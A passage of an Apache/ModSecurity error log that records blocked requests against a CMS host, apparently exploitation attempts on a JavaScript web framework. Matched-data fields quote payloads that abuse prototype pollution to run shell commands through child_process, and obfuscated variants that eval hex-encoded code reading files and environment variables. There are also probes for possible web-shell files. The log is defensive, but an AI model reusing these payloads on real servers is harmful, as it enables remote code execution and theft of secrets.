with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abC0JX3f0uFs60XqYIgdwgAAAZY"] [Wed Mar 11 02:15:34.084138 2026] [:error] [pid 8198:tid 8200] [client 15.134.136.147:40760] [client 15.134.136.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abC0Jn3f0uFs60XqYIgdwwAAAYA"] [Wed Mar 11 02:15:34.376017 2026] [:error] [pid 8198:tid 8202] [client 15.134.136.147:40760] [client 15.134.136.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abC0Jn3f0uFs60XqYIgdxAAAAYI"] [Wed Mar 11 05:01:07.506091 2026] [:error] [pid 16657:tid 16742] [client 40.70.24.180:17760] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gu.php [Wed Mar 11 05:01:07.594768 2026] [:error] [pid 16657:tid 16748] [client 40.70.24.180:17760] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/rafa.php [Fri Mar 13 20:51:21.111928 2026] [:error] [pid 18275:tid 18375] [client 74.243.251.125:9270] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gu.php [Fri Mar 13 20:51:21.213274 2026] [:error] [pid 18275:tid 18360] [client 74.243.251.125:9270] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/rafa.php [Mon Mar 16 03:49:09.885183 2026] [:error] [pid 15335:tid 15348] [client 34.171.127.28:46018] [client 34.171.127.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22ns_hrslex\\x22:true,\\x22data_rbsnsjon\\x22:0.0,\\x22ns_ulxlhrtb\\x22:\\x22idle\\x22,\\x22\\x5cu005f\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu0070\\x5cu006f\\x5cu006e\\x5cu0073\\x5cu0065\\x22:{\\x22\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu0065\\x5cu0066\\x5cu0069\\x5cu0078\\x22:\\x22var pfn=arguments[0x1];var cg=pfn;try{var _v=((0,eval)(global[\\x5c\\x22\\x5c\\x5cx42\\x5c\\x5cx75\\x5c\\x5cx66\\x5c\\x5cx66\\x5c\\x5cx65\\x5c\\x5cx72\\x5c\\x22].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d61776169742069..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abdhlSBpruEdYq5Rt8Jb2wAAAQo"], referer: https://cms.dev-unit.com/ [Mon Mar 16 03:49:10.358348 2026] [:error] [pid 15335:tid 15352] [client 34.171.127.28:46030] [client 34.171.127.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22__hkna\\x22:0,\\x22status\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22x_qurkkl\\x22:\\x224970\\x22,\\x22reason\\x22:-1,\\x22__xkrgzpu\\x22:null,\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22value\\x22:\\x22{\\x5c\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abdhliBpruEdYq5Rt8Jb3QAAAQ4"], referer: https://cms.dev-unit.com/ [Mon Mar 16 03:49:11.259876 2026] [:error] [pid 15335:tid 15360] [client 34.171.127.28:46040] [client 34.171.127.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var by=[].slice.call(arguments,1)[0];var cs=by;try{var _v=((0,eval)(global[String.fromCharCode(66,117,102,102,101,114)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827293b636f6e737420523d7b7d2c453d70726f636573732e656e762c454b3d4f626a6563742e6b6579732845292c45563d4f626a6563742e656e747269..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abdhlyBpruEdYq5Rt8Jb4gAAARU"], referer: https://cms.dev-unit.com/ [Mon Mar 16 03:49:12.345807 2026] [:error] [pid 15335:tid 15341] [client 34.171.127.28:46052] [client 34.171.127.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22__ssrhxjz\\x22:\\x224962\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var by=[].slice.call(arguments,1)[0];var cs=by;try{var _v=((0,eval)(global[String.fromCharCode(66,117,102,102,101,114)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827293b636f6e737420523d7b7d2c453d70726f636573732e656e762c454b3d4f626a6563742e6b6579732845292..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abdhmCBpruEdYq5Rt8Jb5gAAAQM"], referer: https://cms.dev-unit.com/ [Mon Mar 16 03:49:13.525564 2026] [:error] [pid 15335:tid 15338] [client 34.171.127.28:46054] [client 34.171.127.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22status\\x22:\\x22resolved_model\\x22,\\x22__pgnapz\\x22:\\x22d3jkdj1gek00p8f\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22,\\x22reason\\x22:-1,\\x22data_oopklrg\\x22:0.0,\\x22x_mahhie\\x22:[],\\x22__uyvqsbox\\x22:\\x22ptf0\\x22,\\x22ns_swqqr\\x22:\\x22idle\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var by=[].slice.call(arguments,1)[0];var cs=by;try{var _v=((0,eval)(global[String.fromCharCode(66,117,102,102,101,114)].from('286173796e632066756e6374696f6e2829..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abdhmSBpruEdYq5Rt8Jb6gAAAQA"], referer: https://cms.dev-unit.com/ [Mon Mar 16 03:49:14.419937 2026] [:error] [pid 15336:tid 15380] [client 34.171.127.28:46066] [client 34.171.127.28] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "192"] [id "960914"] [rev "1"] [msg "Multipart request body failed strict validation: PE 0, BQ 0, BW 0, DB 1, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "7"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abdhmqQt2w0-VouOZpPXUQAAAU8"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:22.358796 2026] [:error] [pid 15336:tid 15378] [client 34.55.131.57:27756] [client 34.55.131.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22status\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22_omzi\\x22:\\x22g0c3a7xjnrf\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x5c\\x22: \\x5c\\x22$\\x5cu00420\\x5c\\x22}\\x22,\\x22\\x5cu005f\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu0070\\x5cu006f\\x5cu006e\\x5cu0073\\x5cu0065\\x22:{\\x22\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu0065\\x5cu0066\\x5cu0069\\x5cu0078\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgj7qQt2w0-VouOZpPJzgAAAU0"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:22.868952 2026] [:error] [pid 13194:tid 13798] [client 34.55.131.57:36466] [client 34.55.131.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22reason\\x22:-1,\\x22data_gqfi\\x22:\\x227475\\x22,\\x22value\\x22:\\x22{\\x5c\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x5c\\x22: \\x5c\\x22$\\x5cu00420\\x5c\\x22}\\x22,\\x22status\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgj7mjV2nmsjJfhM7M7rQAAAAY"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:23.975191 2026] [:error] [pid 13194:tid 13816] [client 34.55.131.57:36480] [client 34.55.131.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22data_ctky\\x22:\\x22\\x22,\\x22reason\\x22:-1,\\x22ns_gyjxccqi\\x22:0.0,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var ns=[].slice.call(arguments,1)[0];var god=ns;try{var _v=((0,eval)(global[[66,117,102,102,101,114].map(function(c){return String.fromCharCode(c)}).join('')].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f727428276673..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgj72jV2nmsjJfhM7M7twAAABY"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:25.135868 2026] [:error] [pid 15336:tid 15373] [client 34.55.131.57:36488] [client 34.55.131.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22,\\x22data_spqr\\x22:\\x22loading\\x22,\\x22ns_jkywvp\\x22:\\x226903\\x22,\\x22reason\\x22:-1,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22data_wgkboe\\x22:\\x227904\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var ns=[].slice.call(arguments,1)[0];var god=ns;try{var _v=((0,eval)(global[[66,117,102,102,101,114].map(function(c){return String.fromCharCode(c)}).join('')].from('286173..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgj8KQt2w0-VouOZpPJ2gAAAUg"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:26.333119 2026] [:error] [pid 13194:tid 13793] [client 34.55.131.57:36504] [client 34.55.131.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22reason\\x22:-1,\\x22_azp\\x22:\\x22default\\x22,\\x22_map\\x22:null,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var ns=[].slice.call(arguments,1)[0];var god=ns;try{var _v=((0,eval)(global[[66,117,102,102,101,114].map(function(c){return String.fromCharCode(c)}).join('')].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f7274282766732729..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgj8mjV2nmsjJfhM7M7yQAAAAE"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:27.243307 2026] [:error] [pid 13194:tid 13806] [client 34.55.131.57:36506] [client 34.55.131.57] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "192"] [id "960914"] [rev "1"] [msg "Multipart request body failed strict validation: PE 0, BQ 0, BW 0, DB 1, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "7"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgj82jV2nmsjJfhM7M71gAAAA4"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:51.659853 2026] [:error] [pid 13194:tid 13802] [client 35.222.212.222:20794] [client 35.222.212.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22status\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22value\\x22:\\x22{\\x5c\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x5c\\x22: \\x5c\\x22$\\x5cu00420\\x5c\\x22}\\x22,\\x22__dxf\\x22:0,\\x22\\x5cu005f\\x5cu0072..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgkC2jV2nmsjJfhM7M8owAAAAo"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:52.234618 2026] [:error] [pid 13194:tid 13797] [client 35.222.212.222:20800] [client 35.222.212.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22ns_yaw\\x22:\\x229340\\x22,\\x22\\x5cu005f\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu0070\\x5cu006f\\x5cu006e\\x5cu0073\\x5cu0065\\x22:{\\x22\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu0065\\x5cu0066\\x5cu0069\\x5cu0078\\x22:\\x22var ywdss=arguments[0x1];var kj=ywdss;try{var _v=((0,eval)(global[[\\x5c\\x22B\\x5c\\x22,\\x5c\\x22uf\\x5c\\x22,\\x5c\\x22fer\\x5c\\x22].join(\\x5c\\x22\\x5c\\x22)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f7..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgkDGjV2nmsjJfhM7M8qgAAAAU"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:53.069864 2026] [:error] [pid 15335:tid 15348] [client 35.222.212.222:20802] [client 35.222.212.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22,\\x22reason\\x22:-1,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var ywdss=arguments[0x1];var kj=ywdss;try{var _v=((0,eval)(global[[\\x5c\\x22B\\x5c\\x22,\\x5c\\x22uf\\x5c\\x22,\\x5c\\x22fer\\x5c\\x22].join(\\x5c\\x22\\x5c\\x22)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgkDCBpruEdYq5Rt8JptwAAAQo"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:54.198009 2026] [:error] [pid 13194:tid 13803] [client 35.222.212.222:20812] [client 35.222.212.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22$epf\\x22:0.0,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var ywdss=arguments[0x1];var kj=ywdss;try{var 